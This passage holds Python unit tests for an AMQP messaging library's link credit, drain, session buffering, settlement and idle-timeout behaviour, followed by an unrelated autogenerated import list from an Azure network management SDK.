        assert t_rcv.tick(clock) == 0.501, "deadline to send keepalive"
        self.pump()
        assert sndr_frames_in == t_snd.frames_input, "unexpected received frame"
        # this should cause rcvr to expire and send a keepalive
        clock = 0.502
        assert t_snd.tick(clock) == 1.001, "deadline for remote timeout"
        assert t_rcv.tick(clock) == 1.002, "deadline to send keepalive"
        self.pump()
        sndr_frames_in += 1
        rcvr_frames_out += 1
        assert sndr_frames_in == t_snd.frames_input, "unexpected received frame"
        assert rcvr_frames_out == t_rcv.frames_output, "unexpected frame"
        # since a keepalive was received, sndr will rebase its clock against this tick:
        # and the receiver should not change its deadline
        clock = 0.503
        assert t_snd.tick(clock) == 1.503, "deadline for remote timeout"
        assert t_rcv.tick(clock) == 1.002, "deadline to send keepalive"
        self.pump()
        assert sndr_frames_in == t_snd.frames_input, "unexpected received frame"
        # now expire sndr
        clock = 1.504
        t_snd.tick(clock)
        try:
            self.pump()
            assert False, "Expected connection timeout did not happen!"
        except TransportException:
            pass
class CreditTest(Test):
    """Link-credit accounting: flow, drain, and queued-delivery behaviour."""

    def setup(self):
        self.snd, self.rcv = self.link("test-link", max_frame=(16*1024, 16*1024))
        self.c1 = self.snd.session.connection
        self.c2 = self.rcv.session.connection
        self.snd.open()
        self.rcv.open()
        self.pump()

    def teardown(self):
        self.cleanup()

    def testCreditSender(self, count=1024):
        """Credit granted by the receiver accumulates at the sender."""
        credit = self.snd.credit
        assert credit == 0, credit
        self.rcv.flow(10)
        self.pump()
        credit = self.snd.credit
        assert credit == 10, credit
        self.rcv.flow(count)
        self.pump()
        credit = self.snd.credit
        assert credit == 10 + count, credit

    def testCreditReceiver(self):
        """Advancing past a received delivery consumes one credit."""
        self.rcv.flow(10)
        self.pump()
        assert self.rcv.credit == 10, self.rcv.credit
        d = self.snd.delivery("tag")
        assert d
        assert self.snd.advance()
        self.pump()
        assert self.rcv.credit == 10, self.rcv.credit
        assert self.rcv.queued == 1, self.rcv.queued
        c = self.rcv.current
        assert c.tag == "tag", c.tag
        assert self.rcv.advance()
        assert self.rcv.credit == 9, self.rcv.credit
        assert self.rcv.queued == 0, self.rcv.queued

    def _testBufferingOnClose(self, a, b):
        """Remotely close endpoint *b*, then locally close endpoint *a*,
        and verify the ten settled-but-uncredited deliveries remain queued
        at the sender.  a/b name one of connection/session/link."""
        for i in range(10):
            d = self.snd.delivery("tag-%s" % i)
            assert d
            d.settle()
        self.pump()
        assert self.snd.queued == 10
        endpoints = {"connection": (self.c1, self.c2),
                     "session": (self.snd.session, self.rcv.session),
                     "link": (self.snd, self.rcv)}
        local_a, remote_a = endpoints[a]
        local_b, remote_b = endpoints[b]
        remote_b.close()
        self.pump()
        assert local_b.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED
        local_a.close()
        self.pump()
        assert remote_a.state & Endpoint.REMOTE_CLOSED
        assert self.snd.queued == 10

    def testBufferingOnCloseLinkLink(self):
        self._testBufferingOnClose("link", "link")

    def testBufferingOnCloseLinkSession(self):
        self._testBufferingOnClose("link", "session")

    def testBufferingOnCloseLinkConnection(self):
        self._testBufferingOnClose("link", "connection")

    def testBufferingOnCloseSessionLink(self):
        self._testBufferingOnClose("session", "link")

    def testBufferingOnCloseSessionSession(self):
        self._testBufferingOnClose("session", "session")

    def testBufferingOnCloseSessionConnection(self):
        self._testBufferingOnClose("session", "connection")

    def testBufferingOnCloseConnectionLink(self):
        self._testBufferingOnClose("connection", "link")

    def testBufferingOnCloseConnectionSession(self):
        self._testBufferingOnClose("connection", "session")

    def testBufferingOnCloseConnectionConnection(self):
        self._testBufferingOnClose("connection", "connection")

    def testFullDrain(self):
        """Draining with no deliveries pending returns all the credit."""
        assert self.rcv.credit == 0
        assert self.snd.credit == 0
        self.rcv.drain(10)
        assert self.rcv.draining()
        assert self.rcv.credit == 10
        assert self.snd.credit == 0
        self.pump()
        assert self.rcv.credit == 10
        assert self.snd.credit == 10
        assert self.rcv.draining()
        self.snd.drained()
        assert self.rcv.credit == 10
        assert self.snd.credit == 0
        assert self.rcv.draining()
        self.pump()
        assert self.rcv.credit == 0
        assert self.snd.credit == 0
        assert not self.rcv.draining()
        drained = self.rcv.drained()
        assert drained == 10, drained

    def testPartialDrain(self):
        """Draining when one delivery is pending returns the remainder."""
        self.rcv.drain(2)
        assert self.rcv.draining()
        self.pump()
        d = self.snd.delivery("tag")
        assert d
        assert self.snd.advance()
        self.snd.drained()
        assert self.rcv.draining()
        self.pump()
        assert not self.rcv.draining()
        c = self.rcv.current
        assert self.rcv.queued == 1, self.rcv.queued
        assert c.tag == d.tag, c.tag
        assert self.rcv.advance()
        assert not self.rcv.current
        assert self.rcv.credit == 0, self.rcv.credit
        assert not self.rcv.draining()
        drained = self.rcv.drained()
        assert drained == 1, drained

    def testDrainFlow(self):
        """A drain cycle followed by a plain flow keeps credit intact."""
        assert self.rcv.credit == 0
        assert self.snd.credit == 0
        self.rcv.drain(10)
        assert self.rcv.credit == 10
        assert self.snd.credit == 0
        self.pump()
        assert self.rcv.credit == 10
        assert self.snd.credit == 10
        self.snd.drained()
        assert self.rcv.credit == 10
        assert self.snd.credit == 0
        self.pump()
        assert self.rcv.credit == 0
        assert self.snd.credit == 0
        self.rcv.flow(10)
        assert self.rcv.credit == 10
        assert self.snd.credit == 0
        self.pump()
        assert self.rcv.credit == 10
        assert self.snd.credit == 10
        # not in drain mode, so drained() should not consume the credit
        self.snd.drained()
        assert self.rcv.credit == 10
        assert self.snd.credit == 10
        self.pump()
        assert self.rcv.credit == 10
        assert self.snd.credit == 10
        drained = self.rcv.drained()
        assert drained == 10, drained

    def testNegative(self):
        """A delivery created before any credit exists is held back until
        the receiver grants credit."""
        assert self.snd.credit == 0
        d = self.snd.delivery("tag")
        assert d
        assert self.snd.advance()
        self.pump()
        assert self.rcv.credit == 0
        assert self.rcv.queued == 0
        self.rcv.flow(1)
        assert self.rcv.credit == 1
        assert self.rcv.queued == 0
        self.pump()
        assert self.rcv.credit == 1
        assert self.rcv.queued == 1, self.rcv.queued
        c = self.rcv.current
        assert c
        assert c.tag == "tag"
        assert self.rcv.advance()
        assert self.rcv.credit == 0
        assert self.rcv.queued == 0

    def testDrainZero(self):
        """drain(0) still triggers the drain handshake for existing credit."""
        assert self.snd.credit == 0
        assert self.rcv.credit == 0
        assert self.rcv.queued == 0
        drained = self.rcv.drained()
        assert drained == 0
        self.rcv.flow(10)
        self.pump()
        assert self.snd.credit == 10
        assert self.rcv.credit == 10
        assert self.rcv.queued == 0
        # not draining yet, so this drained() is a no-op
        self.snd.drained()
        self.pump()
        assert self.snd.credit == 10
        assert self.rcv.credit == 10
        assert self.rcv.queued == 0
        drained = self.rcv.drained()
        assert drained == 0
        self.rcv.drain(0)
        assert self.snd.credit == 10
        assert self.rcv.credit == 10
        assert self.rcv.queued == 0
        self.pump()
        assert self.snd.credit == 10
        assert self.rcv.credit == 10
        assert self.rcv.queued == 0
        self.snd.drained()
        assert self.snd.credit == 0
        assert self.rcv.credit == 10
        assert self.rcv.queued == 0
        drained = self.rcv.drained()
        assert drained == 0
        self.pump()
        assert self.snd.credit == 0
        assert self.rcv.credit == 0
        assert self.rcv.queued == 0
        drained = self.rcv.drained()
        assert drained == 10

    def testDrainOrder(self):
        """ Verify drain/drained works regardless of ordering. See PROTON-401
        """
        assert self.snd.credit == 0
        assert self.rcv.credit == 0
        assert self.rcv.queued == 0
        #self.rcv.session.connection._transport.trace(Transport.TRACE_FRM)
        #self.snd.session.connection._transport.trace(Transport.TRACE_FRM)
        ## verify that a sender that has reached the drain state will respond
        ## promptly to a drain issued by the peer.
        self.rcv.flow(10)
        self.pump()
        assert self.snd.credit == 10, self.snd.credit
        assert self.rcv.credit == 10, self.rcv.credit
        sd = self.snd.delivery("tagA")
        assert sd
        n = self.snd.send("A")
        assert n == 1
        self.pump()
        self.snd.advance()
        # done sending, so signal that we are drained:
        self.snd.drained()
        self.pump()
        assert self.snd.credit == 9, self.snd.credit
        assert self.rcv.credit == 10, self.rcv.credit
        self.rcv.drain(0)
        self.pump()
        assert self.snd.credit == 9, self.snd.credit
        assert self.rcv.credit == 10, self.rcv.credit
        bytes = self.rcv.recv(10)
        assert bytes == "A", bytes
        self.rcv.advance()
        self.pump()
        assert self.snd.credit == 9, self.snd.credit
        assert self.rcv.credit == 9, self.rcv.credit
        self.snd.drained()
        self.pump()
        assert self.snd.credit == 0, self.snd.credit
        assert self.rcv.credit == 0, self.rcv.credit
        # verify that a drain requested by the peer is not "acknowledged" until
        # after the sender has completed sending its pending messages
        self.rcv.flow(10)
        self.pump()
        assert self.snd.credit == 10, self.snd.credit
        assert self.rcv.credit == 10, self.rcv.credit
        sd = self.snd.delivery("tagB")
        assert sd
        n = self.snd.send("B")
        assert n == 1
        self.snd.advance()
        self.pump()
        assert self.snd.credit == 9, self.snd.credit
        assert self.rcv.credit == 10, self.rcv.credit
        self.rcv.drain(0)
        self.pump()
        assert self.snd.credit == 9, self.snd.credit
        assert self.rcv.credit == 10, self.rcv.credit
        sd = self.snd.delivery("tagC")
        assert sd
        n = self.snd.send("C")
        assert n == 1
        self.snd.advance()
        self.pump()
        assert self.snd.credit == 8, self.snd.credit
        assert self.rcv.credit == 10, self.rcv.credit
        # now that the sender has finished sending everything, it can signal
        # drained
        self.snd.drained()
        self.pump()
        assert self.snd.credit == 0, self.snd.credit
        assert self.rcv.credit == 2, self.rcv.credit
        bytes = self.rcv.recv(10)
        assert bytes == "B", bytes
        self.rcv.advance()
        bytes = self.rcv.recv(10)
        assert bytes == "C", bytes
        self.rcv.advance()
        self.pump()
        assert self.snd.credit == 0, self.snd.credit
        assert self.rcv.credit == 0, self.rcv.credit

    def testPushback(self, count=10):
        """A delivery beyond the granted credit stays queued at the sender."""
        assert self.snd.credit == 0
        assert self.rcv.credit == 0
        self.rcv.flow(count)
        self.pump()
        for i in range(count):
            d = self.snd.delivery("tag%s" % i)
            assert d
            self.snd.advance()
        assert self.snd.queued == count
        assert self.rcv.queued == 0
        self.pump()
        assert self.snd.queued == 0
        assert self.rcv.queued == count
        d = self.snd.delivery("extra")
        self.snd.advance()
        assert self.snd.queued == 1
        assert self.rcv.queued == count
        self.pump()
        # no credit left for "extra", so it must remain on the sender side
        assert self.snd.queued == 1
        assert self.rcv.queued == count

    def testHeadOfLineBlocking(self):
        """A credit-starved link must not block deliveries flowing on a
        second link sharing the same session."""
        self.snd2 = self.snd.session.sender("link-2")
        self.rcv2 = self.rcv.session.receiver("link-2")
        self.snd2.open()
        self.rcv2.open()
        self.pump()
        assert self.snd2.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
        assert self.rcv2.state == Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE
        self.rcv.flow(5)
        self.rcv2.flow(10)
        self.pump()
        assert self.snd.credit == 5
        assert self.snd2.credit == 10
        for i in range(10):
            tag = "test %d" % i
            self.snd.delivery( tag )
            self.snd.send( tag )
            assert self.snd.advance()
            self.snd2.delivery( tag )
            self.snd2.send( tag )
            assert self.snd2.advance()
        self.pump()
        for i in range(5):
            b = self.rcv.recv( 512 )
            assert self.rcv.advance()
            b = self.rcv2.recv( 512 )
            assert self.rcv2.advance()
        # link-2 had twice the credit, so five more arrive on it alone
        for i in range(5):
            b = self.rcv2.recv( 512 )
            assert self.rcv2.advance()
class SessionCreditTest(Test):
    """Session-level flow control: incoming_capacity must bound the bytes
    buffered by the receiving session, forcing the sender to buffer the
    overflow in its own outgoing queue."""

    def teardown(self):
        self.cleanup()

    def testBuffering(self, count=32, size=1024, capacity=16*1024, max_frame=1024):
        """Send *count* deliveries of *size* bytes through a session whose
        incoming capacity is *capacity*, then drain the receiver and verify
        the byte accounting on both sides at every step."""
        snd, rcv = self.link("test-link", max_frame=(max_frame, max_frame))
        rcv.session.incoming_capacity = capacity
        snd.open()
        rcv.open()
        rcv.flow(count)
        self.pump()
        assert count > 0
        total_bytes = count * size
        assert snd.session.outgoing_bytes == 0, snd.session.outgoing_bytes
        assert rcv.session.incoming_bytes == 0, rcv.session.incoming_bytes
        assert snd.queued == 0, snd.queued
        assert rcv.queued == 0, rcv.queued
        idx = 0
        while snd.credit:
            d = snd.delivery("tag%s" % idx)
            assert d
            n = snd.send(chr(ord("a") + idx)*size)
            assert n == size, (n, size)
            assert snd.advance()
            self.pump()
            idx += 1
        assert idx == count, (idx, count)
        # between them, the two sessions hold every byte that was written
        assert snd.session.outgoing_bytes < total_bytes, (snd.session.outgoing_bytes, total_bytes)
        assert rcv.session.incoming_bytes < capacity, (rcv.session.incoming_bytes, capacity)
        assert snd.session.outgoing_bytes + rcv.session.incoming_bytes == total_bytes, \
            (snd.session.outgoing_bytes, rcv.session.incoming_bytes, total_bytes)
        if snd.session.outgoing_bytes > 0:
            available = rcv.session.incoming_capacity - rcv.session.incoming_bytes
            assert available < max_frame, (available, max_frame)
        for i in range(count):
            d = rcv.current
            assert d, i
            pending = d.pending
            before = rcv.session.incoming_bytes
            assert rcv.advance()
            after = rcv.session.incoming_bytes
            assert before - after == pending, (before, after, pending)
            # BUG FIX: track the bytes buffered by the *sending* session
            # (outgoing_bytes).  This previously read incoming_bytes, which
            # is always zero for a pure sender, so the assertions below
            # could never fire.
            snd_before = snd.session.outgoing_bytes
            self.pump()
            snd_after = snd.session.outgoing_bytes
            assert rcv.session.incoming_bytes < capacity
            if snd_before > 0:
                # the sender was blocked on capacity, so the window must
                # have been nearly full, and pumping must have drained some
                # of the sender's buffered bytes
                assert capacity - after <= max_frame
                assert snd_before > snd_after
            if snd_after > 0:
                available = rcv.session.incoming_capacity - rcv.session.incoming_bytes
                assert available < max_frame, available

    def testBufferingSize16(self):
        self.testBuffering(size=16)

    def testBufferingSize256(self):
        self.testBuffering(size=256)

    def testBufferingSize512(self):
        self.testBuffering(size=512)

    def testBufferingSize2048(self):
        self.testBuffering(size=2048)

    def testBufferingSize1025(self):
        self.testBuffering(size=1025)

    def testBufferingSize1023(self):
        self.testBuffering(size=1023)

    def testBufferingSize989(self):
        self.testBuffering(size=989)

    def testBufferingSize1059(self):
        self.testBuffering(size=1059)

    def testCreditWithBuffering(self):
        """Credit updates must still reach the sender even while the
        session's incoming window is congested."""
        snd, rcv = self.link("test-link", max_frame=(1024, 1024))
        rcv.session.incoming_capacity = 64*1024
        snd.open()
        rcv.open()
        rcv.flow(128)
        self.pump()
        assert snd.credit == 128, snd.credit
        assert rcv.queued == 0, rcv.queued
        idx = 0
        while snd.credit:
            d = snd.delivery("tag%s" % idx)
            snd.send("x"*1024)
            assert d
            assert snd.advance()
            self.pump()
            idx += 1
        assert idx == 128, idx
        assert rcv.queued < 128, rcv.queued
        rcv.flow(1)
        self.pump()
        assert snd.credit == 1, snd.credit
class SettlementTest(Test):
    """Delivery settlement accounting on both ends of a link."""

    def setup(self):
        self.snd, self.rcv = self.link("test-link")
        self.c1 = self.snd.session.connection
        self.c2 = self.rcv.session.connection
        self.snd.open()
        self.rcv.open()
        self.pump()

    def teardown(self):
        self.cleanup()

    def testSettleCurrent(self):
        """Settling the sender's current delivery advances past it, and the
        peer observes the deliveries as already settled."""
        self.rcv.flow(10)
        self.pump()
        assert self.snd.credit == 10, self.snd.credit
        d = self.snd.delivery("tag")
        e = self.snd.delivery("tag2")
        assert d
        assert e
        c = self.snd.current
        assert c.tag == "tag", c.tag
        c.settle()
        c = self.snd.current
        assert c.tag == "tag2", c.tag
        c.settle()
        c = self.snd.current
        assert not c
        self.pump()
        c = self.rcv.current
        assert c
        assert c.tag == "tag", c.tag
        assert c.settled
        c.settle()
        c = self.rcv.current
        assert c
        assert c.tag == "tag2", c.tag
        assert c.settled
        c.settle()
        c = self.rcv.current
        assert not c

    def testUnsettled(self):
        """The unsettled count grows on transfer and shrinks on settlement,
        independently on each side."""
        self.rcv.flow(10)
        self.pump()
        assert self.snd.unsettled == 0, self.snd.unsettled
        assert self.rcv.unsettled == 0, self.rcv.unsettled
        d = self.snd.delivery("tag")
        assert d
        assert self.snd.unsettled == 1, self.snd.unsettled
        assert self.rcv.unsettled == 0, self.rcv.unsettled
        assert self.snd.advance()
        self.pump()
        assert self.snd.unsettled == 1, self.snd.unsettled
        assert self.rcv.unsettled == 1, self.rcv.unsettled
        c = self.rcv.current
        assert c
        c.settle()
        # the receiver settling locally does not settle the sender's copy
        assert self.snd.unsettled == 1, self.snd.unsettled
        assert self.rcv.unsettled == 0, self.rcv.unsettled

    def testMultipleUnsettled(self, count=1024, size=1024):
        """Accept (but don't settle) *count* deliveries of *size* bytes,
        then settle them all at the end."""
        self.rcv.flow(count)
        self.pump()
        assert self.snd.unsettled == 0, self.snd.unsettled
        assert self.rcv.unsettled == 0, self.rcv.unsettled
        unsettled = []
        for i in range(count):
            sd = self.snd.delivery("tag%s" % i)
            assert sd
            n = self.snd.send("x"*size)
            assert n == size, n
            assert self.snd.advance()
            self.pump()
            rd = self.rcv.current
            assert rd, "did not receive delivery %s" % i
            n = rd.pending
            b = self.rcv.recv(n)
            assert len(b) == n, (b, n)
            rd.update(Delivery.ACCEPTED)
            assert self.rcv.advance()
            self.pump()
            unsettled.append(rd)
        assert self.rcv.unsettled == count
        for rd in unsettled:
            rd.settle()

    def testMultipleUnsettled2K1K(self):
        self.testMultipleUnsettled(2048, 1024)

    def testMultipleUnsettled4K1K(self):
        self.testMultipleUnsettled(4096, 1024)

    def testMultipleUnsettled1K2K(self):
        self.testMultipleUnsettled(1024, 2048)

    def testMultipleUnsettled2K2K(self):
        self.testMultipleUnsettled(2048, 2048)

    def testMultipleUnsettled4K2K(self):
        self.testMultipleUnsettled(4096, 2048)
class PipelineTest(Test):
    """Pipelined open/send/close issued by a client before the peer has
    responded to anything."""

    def setup(self):
        self.c1, self.c2 = self.connection()

    def teardown(self):
        self.cleanup()

    def test(self):
        """Open a connection/session/link, send ten pre-settled deliveries,
        and close everything — all before a single pump() — then verify the
        peer observes the whole pipelined stream correctly."""
        ssn = self.c1.session()
        snd = ssn.sender("sender")
        self.c1.open()
        ssn.open()
        snd.open()
        for i in range(10):
            d = snd.delivery("delivery-%s" % i)
            snd.send("delivery-%s" % i)
            d.settle()
        snd.close()
        ssn.close()
        self.c1.close()
        self.pump()
        state = self.c2.state
        assert state == (Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_ACTIVE), "%x" % state
        ssn2 = self.c2.session_head(Endpoint.LOCAL_UNINIT)
        assert ssn2
        # BUG FIX: this line was "state == ssn2.state" — a no-op comparison
        # instead of an assignment — so the assert below was re-checking
        # the connection state rather than the session state.
        state = ssn2.state
        assert state == (Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_ACTIVE), "%x" % state
        rcv = self.c2.link_head(Endpoint.LOCAL_UNINIT)
        assert rcv
        state = rcv.state
        assert state == (Endpoint.LOCAL_UNINIT | Endpoint.REMOTE_ACTIVE), "%x" % state
        self.c2.open()
        ssn2.open()
        rcv.open()
        rcv.flow(10)
        assert rcv.queued == 0, rcv.queued
        self.pump()
        # all ten pipelined deliveries arrive at once; the peer endpoints
        # are now remotely closed since the client closed immediately
        assert rcv.queued == 10, rcv.queued
        state = rcv.state
        assert state == (Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED), "%x" % state
        state = ssn2.state
        assert state == (Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED), "%x" % state
        state = self.c2.state
        assert state == (Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_CLOSED), "%x" % state
        for i in range(rcv.queued):
            d = rcv.current
            assert d
            assert d.tag == "delivery-%s" % i
            d.settle()
        assert rcv.queued == 0, rcv.queued
class ServerTest(Test):
    """Idle-timeout behaviour against a real socket-based test server."""

    def testKeepalive(self):
        """ Verify that idle frames are sent to keep a Connection alive
        """
        idle_timeout_secs = self.delay
        self.server = common.TestServerDrain()
        self.server.start()
        self.driver = Driver()
        self.cxtr = self.driver.connector(self.server.host, self.server.port)
        self.cxtr.transport.idle_timeout = idle_timeout_secs
        self.cxtr.sasl().mechanisms("ANONYMOUS")
        self.cxtr.sasl().client()
        self.conn = Connection()
        self.cxtr.connection = self.conn
        self.conn.open()
        #self.session = self.conn.session()
        #self.session.open()
        #self.link = self.session.sender("test-sender")
        #self.link.open()
        # wait for the connection to come up
        deadline = time() + self.timeout
        while self.conn.state != (Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE) \
                and time() <= deadline:
            self.cxtr.process()
            self.driver.wait(0.001)
            self.cxtr.process()
        assert self.conn.state == (Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE), "Connection failed"
        # wait up to 3x the idle timeout
        old_count = self.cxtr.transport.frames_input
        duration = 3 * idle_timeout_secs
        deadline = time() + duration
        while time() <= deadline:
            self.cxtr.process()
            self.driver.wait(0.001)
            self.cxtr.process()
        assert self.conn.state == (Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE), "Connection terminated"
        # the server must have sent idle frames to keep us alive
        assert self.cxtr.transport.frames_input > old_count, "No idle frames received"
        self.server.stop()

    def testIdleTimeout(self):
        """ Verify that a Connection is terminated properly when Idle frames do not
        arrive in a timely manner.
        """
        idle_timeout_secs = self.delay
        self.server = common.TestServerDrain(idle_timeout=idle_timeout_secs)
        self.server.start()
        self.driver = Driver()
        self.cxtr = self.driver.connector(self.server.host, self.server.port)
        self.cxtr.sasl().mechanisms("ANONYMOUS")
        self.cxtr.sasl().client()
        self.conn = Connection()
        self.cxtr.connection = self.conn
        self.conn.open()
        # wait for the connection to come up
        deadline = time() + self.timeout
        while self.conn.state != (Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE) \
                and time() <= deadline:
            self.cxtr.process()
            self.driver.wait(self.timeout)
            self.cxtr.process()
        assert self.conn.state == (Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE), "Connection failed"
        # verify the connection stays up even if we don't explicitly send stuff
        # wait up to 3x the idle timeout
        old_count = self.cxtr.transport.frames_output
        duration = 3 * idle_timeout_secs
        deadline = time() + duration
        while time() <= deadline:
            self.cxtr.process()
            self.driver.wait(10 * duration)
            self.cxtr.process()
        assert self.conn.state == (Endpoint.LOCAL_ACTIVE | Endpoint.REMOTE_ACTIVE), "Connection terminated"
        assert self.cxtr.transport.frames_output > old_count, "No idle frames sent"
        # now wait to explicitly cause the other side to expire:
        sleep(idle_timeout_secs * 3)
        # and check that the remote killed the connection:
        deadline = time() + self.timeout
        while (self.conn.state & Endpoint.REMOTE_ACTIVE) and time() <= deadline:
            self.cxtr.process()
            self.driver.wait(self.timeout)
            self.cxtr.process()
        assert self.conn.state & Endpoint.REMOTE_CLOSED, "Connection failed to close"
        self.server.stop()
class NoValue:
    """Disposition helper that applies nothing and expects all-default fields."""

    def __init__(self):
        pass

    def apply(self, dlv):
        """Leave the local disposition untouched."""
        pass

    def check(self, dlv):
        """Assert every disposition field still holds its default value."""
        defaults = (
            ("data", None),
            ("section_number", 0),
            ("section_offset", 0),
            ("condition", None),
            ("failed", False),
            ("undeliverable", False),
            ("annotations", None),
        )
        for name, expected in defaults:
            assert getattr(dlv, name) == expected
class RejectValue:
    """Disposition helper that sets a rejection condition and verifies it."""

    def __init__(self, condition):
        self.condition = condition

    def apply(self, dlv):
        """Stamp the rejection condition onto the local disposition."""
        dlv.condition = self.condition

    def check(self, dlv):
        """Verify the remote disposition carries only the rejection condition."""
        assert dlv.data == None, dlv.data
        for name in ("section_number", "section_offset"):
            assert getattr(dlv, name) == 0
        assert dlv.condition == self.condition, (dlv.condition, self.condition)
        for name, expected in (("failed", False), ("undeliverable", False), ("annotations", None)):
            assert getattr(dlv, name) == expected
class ReceivedValue:
    """Disposition helper that records partial-transfer progress."""

    def __init__(self, section_number, section_offset):
        self.section_number = section_number
        self.section_offset = section_offset

    def apply(self, dlv):
        """Copy the section number/offset onto the local disposition."""
        dlv.section_number = self.section_number
        dlv.section_offset = self.section_offset

    def check(self, dlv):
        """Verify the remote disposition mirrors the applied progress fields."""
        assert dlv.data == None, dlv.data
        assert dlv.section_number == self.section_number, (dlv.section_number, self.section_number)
        assert dlv.section_offset == self.section_offset
        for name, expected in (
            ("condition", None),
            ("failed", False),
            ("undeliverable", False),
            ("annotations", None),
        ):
            assert getattr(dlv, name) == expected
class ModifiedValue:
    """Disposition helper for the modified outcome (failed/undeliverable/annotations)."""

    def __init__(self, failed, undeliverable, annotations):
        self.failed = failed
        self.undeliverable = undeliverable
        self.annotations = annotations

    def apply(self, dlv):
        """Copy the modified-outcome fields onto the local disposition."""
        dlv.failed = self.failed
        dlv.undeliverable = self.undeliverable
        dlv.annotations = self.annotations

    def check(self, dlv):
        """Verify the remote disposition mirrors the applied modified outcome."""
        assert dlv.data == None, dlv.data
        for name in ("section_number", "section_offset"):
            assert getattr(dlv, name) == 0
        assert dlv.condition == None
        assert dlv.failed == self.failed
        assert dlv.undeliverable == self.undeliverable
        assert dlv.annotations == self.annotations, (dlv.annotations, self.annotations)
class CustomValue:
    """Disposition helper carrying an arbitrary custom data payload."""

    def __init__(self, data):
        self.data = data

    def apply(self, dlv):
        """Attach the custom payload to the local disposition."""
        dlv.data = self.data

    def check(self, dlv):
        """Verify the remote disposition carries only the custom payload."""
        assert dlv.data == self.data, (dlv.data, self.data)
        for name, expected in (
            ("section_number", 0),
            ("section_offset", 0),
            ("condition", None),
            ("failed", False),
            ("undeliverable", False),
            ("annotations", None),
        ):
            assert getattr(dlv, name) == expected
class DeliveryTest(Test):
    """Exercise disposition exchange on deliveries between a sender/receiver pair."""

    def teardown(self):
        self.cleanup()

    # NOTE: `value=NoValue()` is a shared default instance; harmless here because
    # NoValue is stateless, but new value helpers must stay stateless too.
    def testDisposition(self, count=1, tag="tag%i", type=Delivery.ACCEPTED, value=NoValue()):
        snd, rcv = self.link("test-link")
        snd.open()
        rcv.open()
        # Phase 1: sender creates `count` deliveries.
        snd_deliveries = []
        for i in range(count):
            d = snd.delivery(tag % i)
            snd_deliveries.append(d)
            snd.advance()
        # Phase 2: receiver grants credit and collects the deliveries.
        rcv.flow(count)
        self.pump()
        rcv_deliveries = []
        for i in range(count):
            d = rcv.current
            assert d.tag == (tag % i)
            rcv_deliveries.append(d)
            rcv.advance()
        # Phase 3: receiver applies the disposition; sender must observe it.
        for d in rcv_deliveries:
            value.apply(d.local)
            d.update(type)
        self.pump()
        for d in snd_deliveries:
            assert d.remote_state == type
            assert d.remote.type == type
            value.check(d.remote)
            # Echo the same disposition back from the sender side.
            value.apply(d.local)
            d.update(type)
        self.pump()
        # Phase 4: receiver observes the sender's echoed disposition.
        for d in rcv_deliveries:
            assert d.remote_state == type
            assert d.remote.type == type
            value.check(d.remote)
        # Phase 5: settle on the sender; receiver sees settlement, then settles.
        for d in snd_deliveries:
            d.settle()
        self.pump()
        for d in rcv_deliveries:
            assert d.settled, d.settled
            d.settle()

    def testReceived(self):
        self.testDisposition(type=Disposition.RECEIVED, value=ReceivedValue(1, 2))

    def testRejected(self):
        self.testDisposition(type=Disposition.REJECTED, value=RejectValue(Condition(symbol("foo"))))

    def testReleased(self):
        self.testDisposition(type=Disposition.RELEASED)

    def testModified(self):
        self.testDisposition(type=Disposition.MODIFIED,
                             value=ModifiedValue(failed=True, undeliverable=True,
                                                 annotations={"key": "value"}))

    def testCustom(self):
        # Arbitrary (non-standard) disposition type code with a custom payload.
        self.testDisposition(type=0x12345, value=CustomValue([1, 2, 3]))
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from ._application_gateways_operations import ApplicationGatewaysOperations
from ._application_gateway_private_link_resources_operations import ApplicationGatewayPrivateLinkResourcesOperations
from ._application_gateway_private_endpoint_connections_operations import ApplicationGatewayPrivateEndpointConnectionsOperations
from ._application_security_groups_operations import ApplicationSecurityGroupsOperations
from ._available_delegations_operations import AvailableDelegationsOperations
from ._available_resource_group_delegations_operations import AvailableResourceGroupDelegationsOperations
from ._available_service_aliases_operations import AvailableServiceAliasesOperations
from ._azure_firewalls_operations import AzureFirewallsOperations
from ._azure_firewall_fqdn_tags_operations import AzureFirewallFqdnTagsOperations
from ._web_categories_operations import WebCategoriesOperations
from ._bastion_hosts_operations import BastionHostsOperations
from ._network_management_client_operations import NetworkManagementClientOperationsMixin
from ._custom_ip_prefixes_operations import CustomIPPrefixesOperations
from ._ddos_custom_policies_operations import DdosCustomPoliciesOperations
from ._ddos_protection_plans_operations import DdosProtectionPlansOperations
from ._dscp_configuration_operations import DscpConfigurationOperations
from ._available_endpoint_services_operations import AvailableEndpointServicesOperations
from ._express_route_circuit_authorizations_operations import ExpressRouteCircuitAuthorizationsOperations
from ._express_route_circuit_peerings_operations import ExpressRouteCircuitPeeringsOperations
from ._express_route_circuit_connections_operations import ExpressRouteCircuitConnectionsOperations
from ._peer_express_route_circuit_connections_operations import PeerExpressRouteCircuitConnectionsOperations
from ._express_route_circuits_operations import ExpressRouteCircuitsOperations
from ._express_route_service_providers_operations import ExpressRouteServiceProvidersOperations
from ._express_route_cross_connections_operations import ExpressRouteCrossConnectionsOperations
from ._express_route_cross_connection_peerings_operations import ExpressRouteCrossConnectionPeeringsOperations
from ._express_route_ports_locations_operations import ExpressRoutePortsLocationsOperations
from ._express_route_ports_operations import ExpressRoutePortsOperations
from ._express_route_links_operations import ExpressRouteLinksOperations
from ._firewall_policies_operations import FirewallPoliciesOperations
from ._firewall_policy_rule_collection_groups_operations import FirewallPolicyRuleCollectionGroupsOperations
from ._ip_allocations_operations import IpAllocationsOperations
